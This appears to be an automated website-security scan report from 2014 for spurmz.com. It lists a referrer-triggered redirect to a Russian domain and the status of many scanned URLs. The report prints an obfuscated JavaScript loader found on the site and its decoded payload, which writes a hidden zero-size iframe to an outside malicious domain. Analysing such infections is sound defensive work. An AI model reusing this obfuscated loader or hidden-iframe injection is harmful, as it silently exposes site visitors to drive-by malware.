Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://spurmz.com/ (request sent with a search-engine Referer, simulating a visitor arriving from a search engine) GET / HTTP/1.1 Host: spurmz.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 02 Sep 2014 13:22:21 GMT Location: http://mediccan.ru/ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.25 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 Content-Length: 375 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://spurmz.com/ | 200 OK Content-Length: 9488 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var s=' N h uo e i P kXW" 3 1 1 5 1 0 0 2 5 M kXW v 4 O 9 8 0 0 6 9 8 7 8 M kXW,0 1 5 6 8 2 2 0 5 M kXW v 6 O 9 5 9 3 7 4 2 1 1 M kXW v 70 6 3 9 8 1 6 2 1 M kXW\'9 6 5 6 1 5 8 7 4 M v d u j b wv . lo i w ( \' N { xh b w h g uO zE e L / / t d ds | d c w . u d . u u / y d . e z e Q h {" 3 " l {$ zO 2 " z w { y zC " 2 " a { yt " a w x] P N / { xh b w P \' ) M N / h uo e i P';
var t=' d=atnr68;i93"',cn=18,rn=2; function re(s,n,r,b,e){if(s<b||s>e)return s;s-=r;if(s<b)s+=n;return s;} var i = 0,sx=""; while(i<s.length){var ch=s.charAt(i); var c,i1,i2; if(ch==" "){c = s.charAt(i+1);i1=s.charCodeAt(i+1);if(i1<127)c = String.fromCharCode(re(re(re(i1,33,cn,58,90),29,cn,97,125),10,rn,48,57));i++;} else{c=s.charCodeAt(i);if(c<127)c = re(re(re(c,33,cn,58,90),29,cn,97,125),10,rn,48,57);i1 = c>>4; i2 = (c-i1*16);c = t.charAt(i1-1)+""+t.charAt(i2);} i++;if(c==" ")c = "\n";sx+=c;}document.write(sx); Decoded script: var rand=199398803;var rand2=768847656;var rand3=893460083;var rand4=737152099;var rand5=841769409;var rand6=643493652;document.write('<iframe src="http://boondjone.co.cc/go.php?sid=1" width="0" height="0" align="left"></iframe>'); Antivirus reports:
| ||
http://howhigh.xz.lt/pub/counter.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://www.serveriai.lt/talpinimas.html | 200 OK Content-Length: 9936 Content-Type: text/html | clean |
http://www.serveriai.lt/ | 200 OK Content-Length: 7661 Content-Type: text/html | clean |
http://www.serveriai.lt//www.iv.lt/jquery/js/jquery.js/ | HTTP/1.1 302 Found Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.serveriai.lt/test404page.js | HTTP/1.1 302 Found Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.serveriai.lt//www.iv.lt/jquery/js/notice.jquery.js/ | HTTP/1.1 302 Found Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.serveriai.lt//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 302 Found Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.serveriai.lt//www.iv.lt/statistika.php?type=last_order&service=svetain%EBs+talpinimas+ir+el.+pa%F0tas/ | HTTP/1.1 302 Found Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/ Server: Apache Vary: Accept-Encoding Content-Length: 208 Content-Type: text/html; charset=iso-8859-1 | clean |
http://howhigh.xz.lt//www.iv.lt/dokumentai/talpinimas.pdf/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/srautas.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/vieta.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/pastas.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:22 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/php.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/mysql.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/multi-domain.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/programos.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/apsauga.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/ssl.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/kopijos.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/akcija.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/garantija.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/neribojami.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/didmenininkams.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/profesionalus.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/demo/user.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/talpinimas.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/domenai.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/klientams.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://howhigh.xz.lt/pub/pirkti.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 02 Sep 2014 13:22:23 GMT Location: http://www.serveriai.lt/talpinimas.html Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Status: 301 | clean |
http://actchaya.com/test/is.js | 404 Not Found Content-Length: 469 Content-Type: text/html | clean |
http://www.reconstructing.me/is.js | 200 OK Content-Length: 1557 Content-Type: text/html | clean |
http://mondodesign.ro/sll/is.js | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=spurmz.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://spurmz.com/
Result: spurmz.com is not infected or malware details are not published yet.
Result: spurmz.com is not infected or malware details are not published yet.